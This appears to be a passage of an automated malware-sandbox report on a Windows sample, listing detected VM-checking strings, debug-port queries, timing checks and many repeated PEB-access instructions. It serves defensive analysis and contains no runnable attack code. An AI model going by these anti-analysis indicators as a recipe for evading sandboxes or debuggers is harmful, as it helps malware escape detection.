            Source: explorer.exe, 00000002.00000000.693078252.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: JdtN8nIcLi8RQOi.exe, 00000000.00000002.676624298.0000000003A61000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
            Source: explorer.exe, 00000002.00000000.696503730.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
            Source: JdtN8nIcLi8RQOi.exe, 00000000.00000002.676624298.0000000003A61000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
            Source: explorer.exe, 00000002.00000000.693078252.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeProcess information queried: ProcessInformation
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\WWAHost.exeProcess queried: DebugPort
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_004088A0 rdtsc
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_00409B10 LdrLoadDll,
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01139100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01139100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01139100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0116513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0116513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01154120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01154120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01154120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01154120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01154120 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0115B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0115B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0113B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0113B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0113C962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01162990 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0116A185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0115C182 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011B51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011B51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011B51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011B51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011661A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011661A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011F49A4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011F49A4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011F49A4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011F49A4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011B69A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0113B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0113B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0113B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011C41E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011B7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011B7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011B7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0115A830 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0115A830 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0115A830 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0115A830 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01204015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01204015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0116002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0116002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0116002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0116002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0116002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0114B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0114B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0114B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0114B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01150050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01150050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01201074 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011F2073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01139080 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011B3884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011B3884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0116F0BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0116F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0116F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011620A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011620A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011620A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011620A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011620A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011620A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011790AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011CB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011CB8D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011CB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011CB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011CB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011CB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011340E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011340E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011340E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011358EC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011F131B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0113F358 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0113DB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01163B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01163B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0113DB60 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01208B58 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01162397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01205BA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0116B390 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011F138A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01141B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01141B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011ED380 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01164BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01164BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01164BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011B53CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011B53CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011603E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011603E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011603E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011603E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011603E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011603E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0115DBE9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01135210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01135210 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01135210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01135210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0113AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0113AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01153A1C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011FAA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011FAA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01148A0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01174A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01174A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0115A229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0115A229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0115A229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0115A229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0115A229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0115A229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0115A229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0115A229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0115A229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01208A62 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011FEA55 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011C4257 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01139240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01139240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01139240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01139240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0117927A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011EB260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011EB260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0116D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0116D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0114AAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0114AAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0116FAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011352A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011352A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011352A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011352A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011352A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01162ACB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01162AE4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01208D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01143D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01143D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01143D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01143D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01143D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01143D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01143D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01143D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01143D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01143D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01143D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01143D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01143D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0113AD30 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011FE539 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011BA537 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01164D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01164D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01164D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01157D50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01173D43 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011B3540 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011E3D40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0115C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0115C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_012005AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_012005AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0116FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0116FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01162581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01162581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01162581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01162581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01132D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01132D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01132D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01132D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01132D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01161DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01161DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01161DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011635A1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011B6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011B6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011B6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011B6DC9 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011B6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011B6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011E8DF1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0114D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0114D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011FFDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011FFDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011FFDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011FFDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011B6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011B6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011B6C0A mov eax, dword ptr fs:[00000030h]
